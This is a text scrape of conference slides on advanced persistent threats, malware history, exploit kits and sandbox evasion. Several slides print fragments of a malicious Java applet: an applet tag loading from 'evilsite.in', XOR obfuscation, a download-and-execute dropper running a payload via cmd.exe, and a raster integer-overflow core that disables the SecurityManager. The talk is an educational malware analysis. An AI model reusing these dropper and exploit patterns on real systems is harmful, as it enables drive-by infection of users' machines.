SlideShare ist ein Scribd-Unternehmen logo

The magic world of APT 0.6 - Pompili

‱
‱
Codemotion
Codemotion

Slides from Simone Pompili talk @Codemotion Roma 2014

TechnologieBusiness
1 von 51
Downloaden Sie, um offline zu lesen
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com THE MAGIC WORLD OF ADVANCED PERSISTENT THREATS Andrea Pompili There are only 10 types of people in the world: Those who understand binary, and those who don't apompili@hotmail.com
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Attacker Zovi) http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Come si sviluppa un attacco? <#1> <#2> <#3>
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <1996> The Dark Side of the Moon http://vx.org.ua/29a/main.html
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com rem barok -loveletter(vbe) <i hate go to school> rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines <2000> 8,7 miliardi di dollari
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <2001> The Nimda Style Microsoft IIS e PWS Extended Unicode Directory transversalVulnerability Microsoft IIS/PWS Escaped Characters Decoding Command Execution Vulnerability Microsoft IE MIME Header Attachment Execution VulnerabilityTFTP Server UDP:69 RICHED20.DLL Microsoft Office 2000 DLL Execution Vulnerability Microsoft IE MIME Header Attachment Execution Vulnerability 635 milioni di dollari
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com SQL Server 2000 Desktop Engine 75.000 computer infettati in soli 10 minuti payload di soli 376 byte (residente esclusivamente in memoria) 1,2 miliardi di dollari
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com 22,6 miliardi di dollari DDOS contro www.sco.com Upload&Execute0x85 0x13 0x3c 0x9e 0xa2 Backdoor TCP 3127-3198 http://echohacker.altervista.org/articoli/mydoom.html
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <2010-2012> Government in Action > Stuxnet (2010) > Duqu (2011) > Flame (2012) > Gauss (2012) http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping- for-zero-days-an-price-list-for-hackers-secret-software-exploits/ ShoppingFor Zero-Days
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Il Malware piĂč complesso della storia > 20MB di dimensione (900Kb programma principale/dropper + 16 moduli ad oggi rilevati) > 80 domini utilizzati come sistemi di Comando e Controllo > Diffusione via USB Stick (Infectmedia) > Enumerazione dei dispositivi Bluetooth (Beetlejuice) > Registrazione audio (Microbe) > Windows Update MITM (Munch & Gadget) MD5 Collision Attack
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <2007> Storm Worm & CyberCrime Market http://www.pcworld.com/article/138694/article.html
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com http://www.infosecblog.org/2013/01/you-are-the-target/hackedpc2012/ « »
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Advanced Persistent Threats 101 > Trust Exploitation Social Engineering Spear Phishing Botnet Drive-to-Click Strategy
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com > Trust Exploitation > Client Exploitation Exploit Pack (e.g.Neutrino) 0-Day Advanced Persistent Threats 101
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com > Trust Exploitation > Client Exploitation > Multi-Stage Shellcoding Dropper/Downloader Modules(e.g.RAT, Infostealer,etc.) Good Covert Channel Advanced Persistent Threats 101
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com > Trust Exploitation > Client Exploitation > Multi-Stage > Multi-Vector Email WebSites Botnet Physical (USB) Advanced Persistent Threats 101
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com > Trust Exploitation > Client Exploitation > Multi-Stage > Multi-Vector > Resiliency Camouflaging Command &Control Good Covert Channel Advanced Persistent Threats 101
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Make or Buy?
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Botnet Choice
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Drive-to-Click <#1>
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Drive-to-Click <#2>
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Drive-to-Click <#3>
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Drive-to-Click <#4>
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Drive-to-Click <#5>
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Trick#1> Giochiamo con le estensioni RLO Unicode control character
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Trick#2> Content-Disposition Nightmare http://www.gnucitizen.org/blog/content-disposition-hacking/ Download Server Response Headers RFC 2616
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <applet codebase=“http://blahblah.evilsite.in/hiddenpath/" archive=“http://blahblah.othersite.in/hiddenpath/ c8c34734f41cca863a972129369060d9” code=“rgmiv”> Trick#3> Client Exploiting
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com public class xp extends JApplet { public void init() { try { Object aobj[] = new Object[0]; Object obj = gsdfvg.ccla(tcbteokd.fuss(tcbteokd.p), 1); String s = "hpjwbludyi"; s = "wgpxrwyvzolbb"; s = "zdfmvftloqmakqysyu"; s = "nrrkqnjfylgtljyyferr"; cr.hzumfnc(obj); Object aobj1[] = new Object[0]; String s1 = "ofvszonrzgelnko"; s1 = "fefhtspcqhj"; s1 = "evztavmzjarjgwu"; Object obj1 = ygigtele.bjixqh(tcbteokd.fuss(tcbteokd.nq), new Class[] { Integer.TYPE }).newInstance(new Object[] { Integer.valueOf(tcbteokd.mdrikbua(9)) }); int ai[] = new int[8]; Object aobj2[] = new Object[7]; aobj2[2] = cr.hzumfnc(obj); ...
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <01> XOR String Encryption public static String ok = ha.n("1:-:u:,/u26:<>ub:6+7>0264?>7"); ... public static String n(String s) { String s1 = ""; for (int i = 0; i < s.length(); i++) s1 += idzfihff(s.charAt(i)); return s1; } ... public static char idzfihff(char c) { return (char)(c ^ 0x5b); } https://media.blackhat.com/bh-us-12/Briefings/Oh/ BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf Malware
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <02> Java Reflection public static Class fuss(String s) throws Exception { return Class.forName(s); } ... public static Object dngfuv(Method method, Object obj, Object aobj[]) { return method.invoke(obj, aobj); } public static Constructor bjixqh(Class class1, Class aclass[]) { return class1.getConstructor(aclass); } ... https://media.blackhat.com/bh-us-12/Briefings/Oh/ BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf Malware
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <03> ClassLoader Override class t extends ClassLoader { public static void ujrzjw(t t1, String s) { try { Class class1 = t1.defineClass("qbw", tcbteokd.xcpoalaefqfvuacylvakyi, 0, tcbteokd.xcpoalaefqfvuacylvakyi.length); ygigtele.bjixqh(class1, new Class[] { tcbteokd.fuss("java.lang.String") }).newInstance(new Object[] { s }); } catch (Exception ex) { System.exit(0); } } } Malware
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com ... private static void lcsqyrgtbct (String s, int i) { String s1 = s + Integer.valueOf(i); ... rchannel= Channels.newChannel((new URL(s1)).openStream()); ... File file = File.createTempFile("~tmf", null); FileOutputStream fos= new FileOutputStream(file); for (int j = 0; j < abyte0.length; j++) abyte0[j] = (byte)(abyte0[j] ^ 0x29); fos.write(abyte0); if (abyte0.length > 1024) try { Runtime.getRuntime().exec(new String[] { "cmd.exe", "/C", file.getAbsolutePath() }); } catch (IOException ioe) { (new ProcessBuilder(new String[] { file.getAbsolutePath() })).start(); } The Dropper Class
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Object obj1 = new java.awt.image.DataBufferByte(9); int[] ai = new int[8]; Object[] oo = new Object[7]; oo[2] = new java.beans.Statement(System.class, "setSecurityManager", new Object[1]); ... DataBufferByte obj5 = new DataBufferByte(8); for (int j = 0; j < 8; j++) obj5.setElem(j, -1); MultiPixelPackedSampleModel obj6 = new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE,4,1,1,4,0); Raster obj7 = Raster.createWritableRaster(obj6, obj5, null); MultiPixelPackedSampleModel obj8 = new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE,4,2,1, 0x3fffffdd - (tcbteokd.pi ? 16 : 0), 288 + (tcbteokd.pi ? 128 : 0)); Raster obj9 = Raster.createWritableRaster(obj8, obj1, null); byte obj10 = new byte[] {0, -1} IndexColorModel obj11 = new IndexColorModel(1, 2, obj10, obj10, obj10); CompositeContext obj12 = AlphaComposite.Src.createContext(obj11, obj11, null); obj12.compose(obj7, obj9, obj9); The Malware Core http://valhalla.allalla.com/2013/08/ java-netbeans-applet-integer-overflow-win32-target-added/
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Cheaper Path to Exploiting Blackole Exploit Kit http://en.wikipedia.org/wiki/Blackhole_exploit_kit Styx Exploit Pack http://krebsonsecurity.com/2013/07/styx-exploit-pack-domo-arigato-pc-roboto Neutrino http://malware.dontneedcoffee.com/2013/03/hello-neutrino-just-one-more- exploit-kit.html RedKit http://blog.spiderlabs.com/2012/05/a-wild-exploit-kit-appears.html
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The InfoStealer Choice
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The RAT Choice
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Bitcoin + APT = Ransomware
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Command&Control Choice <#1>
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Command&Control Choice <#2>
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Command&Control Choice <#3>
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Command&Control Choice <#4>
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com “The truth is, consumer-grade antivirus products can’t protect against targeted malware created by well- resourced nation-states with bulging budgets. They can protect you against run-of-the-mill malware: banking trojans, keystroke loggers and e-mail worms. But targeted attacks like these go to great lengths to avoid antivirus products on purpose” MikkoHypponen(F-Secure) <2012> The Antivirus Maker Confession
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Way to Sandboxing
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <01> USER-MODE AGENT Softwarecomponent inaguest operating system (keylogger) <02> KERNEL-MODE PATCHING Guestoperating system Kernelmodified fortracing (rootkit) <03> VIRTUAL MACHINE MONITORING Customized Hypervisor to monitor the guest operatingsystem <04> SYSTEM EMULATION Hardwareemulator to hookappropriate memory, IO functions,peripherals, etc. <05> KERNEL EMULATION Kernelemulator tohookappropriate system calls, etc. The Way to Sandboxing
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Una lista (molto) parziale dei Player > Norman Sandbox (Norway2001) > FireEye (US2004) > Damballa (US2006) > Lastline/Anubis/Wepawet (Austria 2006) > Sandboxie (2006) > Cuckoo Sandbox (2010) > VMRay formerly CWSandbox (Germany 2007) > Joe Security LLC (Switzerland 2007) > BitBlaze (2008) > ThreatExpert (Ireland 2008) > Ether (US 2009)
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Una lista (completamente) parziale degli Evader
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Evading Sandbox 4 Dummies > Human Interaction (UpClicker, December 2012) > MessageBox (Something thatneed to be clicked) > Sleep Calls (Trojan Nap, uncoveredin February2013) > Time Triggers (Hastati, March 2013 a massive, data-destroying attack in South Korea) > Check Internet Connection > Check Volume information and Size > Check self Executable name > Execution after reboot > Check System services, files and communication ports
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Il limite delle Sandbox Minuti def: il Paziente Zero Ăš il primo paziente individuato nel campione della popolazione di un'indagine epidemiologica

Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Sicuramente meglio che confidare negli utenti
Page  â€čNâ€ș Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Domande? Italian â€«Ű©â€ŹÙ‘ÙŽâ€«ÙŠâ€ŹÙŽâ€«ŰŁâ€Ź â€«ÙŰšâ€Źâ€«Ù„â€Źâ€«Ű§â€ŹÙŽâ€«Ű·â€ŹÙŽâ€«Ù…â€Ź Arabic ÂżPreguntas? Spanish Questions? English tupoQghachmey Klingon Sindarin Japanese Î•ÏÏ‰Ï„ÎźÏƒÎ”Îčς? Greek ĐČĐŸĐżŃ€ĐŸŃŃ‹? Russian

Empfohlen

The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015
The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015
The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015Codemotion
 
Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Shubham Gupta
 
DNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededDNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededFrans RosĂ©n
 
Command Line Hacks For SEO - Brighton April 2018 - Tom Pool
Command Line Hacks For SEO - Brighton April 2018 - Tom PoolCommand Line Hacks For SEO - Brighton April 2018 - Tom Pool
Command Line Hacks For SEO - Brighton April 2018 - Tom PoolTom Pool
 
Top 10 pool manager interview questions and answers
Top 10 pool manager interview questions and answersTop 10 pool manager interview questions and answers
Top 10 pool manager interview questions and answersbeckyhi011
 
Hackfest presentation.pptx
Hackfest presentation.pptxHackfest presentation.pptx
Hackfest presentation.pptxPeter Yaworski
 
The secret web performance metric no one is talking about
The secret web performance metric no one is talking aboutThe secret web performance metric no one is talking about
The secret web performance metric no one is talking aboutAnna Migas
 
Malware analysis
Malware analysisMalware analysis
Malware analysisPrakashchand Suthar
 

Empfohlen

The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015
The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015
The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015Codemotion
 
Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Shubham Gupta
 
DNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededDNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededFrans RosĂ©n
 
Command Line Hacks For SEO - Brighton April 2018 - Tom Pool
Command Line Hacks For SEO - Brighton April 2018 - Tom PoolCommand Line Hacks For SEO - Brighton April 2018 - Tom Pool
Command Line Hacks For SEO - Brighton April 2018 - Tom PoolTom Pool
 
Top 10 pool manager interview questions and answers
Top 10 pool manager interview questions and answersTop 10 pool manager interview questions and answers
Top 10 pool manager interview questions and answersbeckyhi011
 
Hackfest presentation.pptx
Hackfest presentation.pptxHackfest presentation.pptx
Hackfest presentation.pptxPeter Yaworski
 
The secret web performance metric no one is talking about
The secret web performance metric no one is talking aboutThe secret web performance metric no one is talking about
The secret web performance metric no one is talking aboutAnna Migas
 
Malware analysis
Malware analysisMalware analysis
Malware analysisPrakashchand Suthar
 
Top 10 it specialist interview questions and answers
Top 10 it specialist interview questions and answersTop 10 it specialist interview questions and answers
Top 10 it specialist interview questions and answersCateBlanchett345
 
How to produce great multilingual content, even when you can't read it | Laur...
How to produce great multilingual content, even when you can't read it | Laur...How to produce great multilingual content, even when you can't read it | Laur...
How to produce great multilingual content, even when you can't read it | Laur...Oban International
 
The Game of Bug Bounty Hunting - Money, Drama, Action and Fame
The Game of Bug Bounty Hunting - Money, Drama, Action and FameThe Game of Bug Bounty Hunting - Money, Drama, Action and Fame
The Game of Bug Bounty Hunting - Money, Drama, Action and FameAbhinav Mishra
 
OWASP WTE - Now in the Cloud!
OWASP WTE - Now in the Cloud!OWASP WTE - Now in the Cloud!
OWASP WTE - Now in the Cloud!Matt Tesauro
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?Mikhail Egorov
 
Bug Bounty - Hackers Job
Bug Bounty - Hackers JobBug Bounty - Hackers Job
Bug Bounty - Hackers JobArbin Godar
 
АтаĐșĐž ĐœĐ° ĐČĐžĐŽĐ”ĐŸĐșĐŸĐœĐČДртДры: ĐłĐŸĐŽ спустя
АтаĐșĐž ĐœĐ° ĐČĐžĐŽĐ”ĐŸĐșĐŸĐœĐČДртДры: ĐłĐŸĐŽ спустяАтаĐșĐž ĐœĐ° ĐČĐžĐŽĐ”ĐŸĐșĐŸĐœĐČДртДры: ĐłĐŸĐŽ спустя
АтаĐșĐž ĐœĐ° ĐČĐžĐŽĐ”ĐŸĐșĐŸĐœĐČДртДры: ĐłĐŸĐŽ спустяPositive Hack Days
 
BrightonSEO - ChatGPT-4 Localisation friend or foe FINAL.pptx
BrightonSEO - ChatGPT-4 Localisation friend or foe FINAL.pptxBrightonSEO - ChatGPT-4 Localisation friend or foe FINAL.pptx
BrightonSEO - ChatGPT-4 Localisation friend or foe FINAL.pptxJamesBall92
 
Solar winds supply chain breach - Insights from the trenches
Solar winds supply chain breach - Insights from the trenchesSolar winds supply chain breach - Insights from the trenches
Solar winds supply chain breach - Insights from the trenchesInfosec
 
Bug Bounty 101
Bug Bounty 101Bug Bounty 101
Bug Bounty 101Shahee Mirza
 
Bullshit, Own It: A Temperamental SEO's Guide To Getting Shit Done
Bullshit, Own It: A Temperamental SEO's Guide To Getting Shit DoneBullshit, Own It: A Temperamental SEO's Guide To Getting Shit Done
Bullshit, Own It: A Temperamental SEO's Guide To Getting Shit DoneIan Lurie
 
Deep Exploit@Black Hat Europe 2018 Arsenal
Deep Exploit@Black Hat Europe 2018 ArsenalDeep Exploit@Black Hat Europe 2018 Arsenal
Deep Exploit@Black Hat Europe 2018 ArsenalIsao Takaesu
 
A beginner's guide to machine learning for SEOs - WTSFest 2022
A beginner's guide to machine learning for SEOs - WTSFest 2022A beginner's guide to machine learning for SEOs - WTSFest 2022
A beginner's guide to machine learning for SEOs - WTSFest 2022LazarinaStoyanova
 
Smxl milan 2019 - Apps script for SEO
Smxl milan 2019 - Apps script for SEOSmxl milan 2019 - Apps script for SEO
Smxl milan 2019 - Apps script for SEODavid Sottimano
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
Secrets of Google VRP by: Krzysztof Kotowicz, Google Security Team
Secrets of Google VRP by: Krzysztof Kotowicz, Google Security TeamSecrets of Google VRP by: Krzysztof Kotowicz, Google Security Team
Secrets of Google VRP by: Krzysztof Kotowicz, Google Security TeamOWASP Delhi
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...Frans Rosén
 
NY WebPerf Sept '22 - Performance Mistakes - An HTTP Archive Deep Dive
NY WebPerf Sept '22 - Performance Mistakes - An HTTP Archive Deep DiveNY WebPerf Sept '22 - Performance Mistakes - An HTTP Archive Deep Dive
NY WebPerf Sept '22 - Performance Mistakes - An HTTP Archive Deep DivePaul Calvano
 
API Testing and Hacking (1).pdf
API Testing and Hacking (1).pdfAPI Testing and Hacking (1).pdf
API Testing and Hacking (1).pdfVishwas N
 
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...ufpb
 
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...Codemotion
 
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...Codemotion
 

Weitere Àhnliche Inhalte

Was ist angesagt?

Top 10 it specialist interview questions and answers
Top 10 it specialist interview questions and answersTop 10 it specialist interview questions and answers
Top 10 it specialist interview questions and answersCateBlanchett345
 
How to produce great multilingual content, even when you can't read it | Laur...
How to produce great multilingual content, even when you can't read it | Laur...How to produce great multilingual content, even when you can't read it | Laur...
How to produce great multilingual content, even when you can't read it | Laur...Oban International
 
The Game of Bug Bounty Hunting - Money, Drama, Action and Fame
The Game of Bug Bounty Hunting - Money, Drama, Action and FameThe Game of Bug Bounty Hunting - Money, Drama, Action and Fame
The Game of Bug Bounty Hunting - Money, Drama, Action and FameAbhinav Mishra
 
OWASP WTE - Now in the Cloud!
OWASP WTE - Now in the Cloud!OWASP WTE - Now in the Cloud!
OWASP WTE - Now in the Cloud!Matt Tesauro
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?Mikhail Egorov
 
Bug Bounty - Hackers Job
Bug Bounty - Hackers JobBug Bounty - Hackers Job
Bug Bounty - Hackers JobArbin Godar
 
АтаĐșĐž ĐœĐ° ĐČĐžĐŽĐ”ĐŸĐșĐŸĐœĐČДртДры: ĐłĐŸĐŽ спустя
